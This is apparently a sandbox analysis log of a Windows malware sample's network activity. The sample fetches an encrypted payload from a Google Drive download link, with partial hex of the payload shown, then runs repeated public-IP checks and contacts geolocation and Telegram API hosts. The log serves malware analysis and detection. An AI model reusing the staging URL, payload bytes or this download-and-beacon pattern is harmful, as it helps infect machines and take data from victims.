                                                                                                          Jan 10, 2025 21:17:11.033934116 CET1.1.1.1192.168.2.80xeeaeNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:11.033934116 CET1.1.1.1192.168.2.80xeeaeNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:11.033934116 CET1.1.1.1192.168.2.80xeeaeNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:17:11.033934116 CET1.1.1.1192.168.2.80xeeaeNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          • drive.google.com
                                                                                                          • drive.usercontent.google.com
                                                                                                          • reallyfreegeoip.org
                                                                                                          • api.telegram.org
                                                                                                          • checkip.dyndns.org
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.849827193.122.6.168805060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:17:00.861711979 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:17:01.515934944 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:17:01 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 10, 2025 21:17:01.530189991 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 21:17:01.733083010 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:17:01 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 10, 2025 21:17:09.659775972 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 21:17:09.867818117 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:17:09 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.849888132.226.247.73805060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:17:11.039938927 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 21:17:11.735805988 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:17:11 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.849900132.226.247.73805060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:17:12.701349020 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:17:13.391932011 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:17:13 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.849912132.226.247.73805060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:17:14.344854116 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:17:15.017756939 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:17:14 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.849924132.226.247.73805060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:17:16.002155066 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:17:16.674288034 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:17:16 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.849940132.226.247.73805060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:17:17.910092115 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:17:18.588387012 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:17:18 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.849952132.226.247.73805060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:17:19.577498913 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:17:20.276863098 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:17:20 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.849965132.226.247.73805060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:17:21.290628910 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:17:21.974267960 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:17:21 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.849978132.226.247.73805060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:17:23.001033068 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:17:23.690236092 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:17:23 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.849991132.226.247.73805060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:17:24.719990015 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:17:25.408899069 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:17:25 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.849997132.226.247.73805060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:17:26.420572996 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:17:27.122813940 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:17:27 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.849795142.250.184.2064435060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:16:56 UTC216OUTGET /uc?export=download&id=17zh6-Wlf0aT1vS8RBy4ZmVv4fH0VS4Vd HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Host: drive.google.com
                                                                                                          Cache-Control: no-cache
                                                                                                          2025-01-10 20:16:56 UTC1920INHTTP/1.1 303 See Other
                                                                                                          Content-Type: application/binary
                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                          Date: Fri, 10 Jan 2025 20:16:56 GMT
                                                                                                          Location: https://drive.usercontent.google.com/download?id=17zh6-Wlf0aT1vS8RBy4ZmVv4fH0VS4Vd&export=download
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                          Content-Security-Policy: script-src 'nonce-zXncA7CKt1mfFqgFQlYhpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                          Server: ESF
                                                                                                          Content-Length: 0
                                                                                                          X-XSS-Protection: 0
                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.849801142.250.184.1934435060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:16:57 UTC258OUTGET /download?id=17zh6-Wlf0aT1vS8RBy4ZmVv4fH0VS4Vd&export=download HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Cache-Control: no-cache
                                                                                                          Host: drive.usercontent.google.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 20:17:00 UTC4950INHTTP/1.1 200 OK
                                                                                                          X-GUploader-UploadID: AFIdbgSfi3XCZdmV2AVWsC__qwmjZIGTW58R3IqzlF3iGsXnrtYy6HuuhrbChTwvF5IJiMZ3hZnHQvY
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Security-Policy: sandbox
                                                                                                          Content-Security-Policy: default-src 'none'
                                                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                                                          X-Content-Security-Policy: sandbox
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Content-Disposition: attachment; filename="WaHCeJwgVQzPCnrVxYjGR89.bin"
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 94272
                                                                                                          Last-Modified: Wed, 11 Dec 2024 21:02:24 GMT
                                                                                                          Date: Fri, 10 Jan 2025 20:16:59 GMT
                                                                                                          Expires: Fri, 10 Jan 2025 20:16:59 GMT
                                                                                                          Cache-Control: private, max-age=0
                                                                                                          X-Goog-Hash: crc32c=S8Y9uA==
                                                                                                          Server: UploadServer
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
                                                                                                          2025-01-10 20:17:00 UTC4950INData Raw: d8 07 50 86 0d f7 6e cf d9 fd 9c 89 48 41 e3 b2 3e 03 e3 92 a2 69 5a 61 15 d3 48 8a ce 4b d9 a5 e4 ef bc 85 88 e5 69 b0 11 b8 9e ed 31 29 d3 0e 1f a6 6b 92 ce 65 e1 0c 7c 7a 0e 86 0c 74 3a 46 d6 e4 13 a2 02 f0 20 0b 17 73 32 70 6e 6d 22 c7 e4 e1 7e a0 3d 6c 6a 3c 33 23 17 86 83 f3 63 38 1a 9b ae bb 5b ec 85 3a 4b 59 32 3d 87 1e 7d 5a 6d 60 f2 44 5c aa bf 00 1c b3 fe 11 eb 5c 11 c7 e6 64 a3 91 fe 38 ad af 9c 92 73 55 3c f3 26 a6 8f f9 aa 06 4a 30 e3 7c 03 a0 91 4d 20 a5 57 ef e7 2a 85 e1 06 36 1d 61 39 b4 f1 a1 41 86 ba 7e fb 9f 50 be 91 8a 30 85 f2 fa 80 5c 87 cf 8a c5 30 47 c9 3f a0 22 95 1d c5 e2 e7 9a a2 30 a0 96 f8 5e de e4 f6 90 a0 60 32 36 2e b0 d7 58 41 56 19 fc a4 f5 6f 10 a2 da 7b 52 59 fb c4 0d b9 4a cc 43 cd 2f 3e da dd 4a b5 42 8b 5d c2 c1 3f
                                                                                                          Data Ascii: PnHA>iZaHKi1)ke|zt:F s2pnm"~=lj<3#c8[:KY2=}Zm`D\\d8sU<&J0|M W*6a9A~P0\0G?"0^`26.XAVo{RYJC/>JB]?
                                                                                                          2025-01-10 20:17:00 UTC4799INData Raw: 29 d3 87 30 ef 03 5c 98 4b bc 68 4c 5d 97 12 bf 74 62 75 f2 a8 e3 f1 9c 22 e0 88 bb 2e ee 24 e5 bb b4 54 1e 28 4c d3 51 77 d6 ef 5a 66 3f e6 4f 4a 9b f3 f7 d6 75 3b 07 cb a4 ea 38 e6 cb df a8 4f 35 d8 64 6c 1e 60 a0 d3 75 b8 01 4d ce 9a 10 c9 24 d8 ab a8 51 93 72 48 fd 0e fa ab 7f 56 c7 7e 6b b7 da 54 15 fe e6 ea 27 7f 72 f4 d1 c5 b0 b0 b5 3d 78 63 72 74 9e e7 f4 05 27 ac 15 9f 97 f4 3b a1 a1 e4 1f 9b 52 df 9e ba 28 59 75 c0 90 fd d5 fd 97 5b 63 04 8b 15 b8 19 76 d4 0e da 4f bb 05 8e 14 76 48 41 73 d7 ae b2 93 22 69 0e b1 bc 4d a6 4b a3 bb 00 40 c1 18 b8 76 ea f0 92 d1 86 fb 10 b8 ab bf b5 ed f8 37 75 8d be 9d e4 cc 01 f5 ab b7 01 22 d7 09 07 8c cb c8 1b 64 1d 81 aa 25 ee e3 76 0a 12 69 aa 1e 67 5f 33 00 0c 94 a1 2f d4 b9 c6 2b 5b 3f 42 d6 a3 cf bc e0 38
                                                                                                          Data Ascii: )0\KhL]tbu".$T(LQwZf?OJu;8O5dl`uM$QrHV~kT'r=xcrt';R(Yu[cvOvHAs"iMK@v7u"d%vig_3/+[?B8
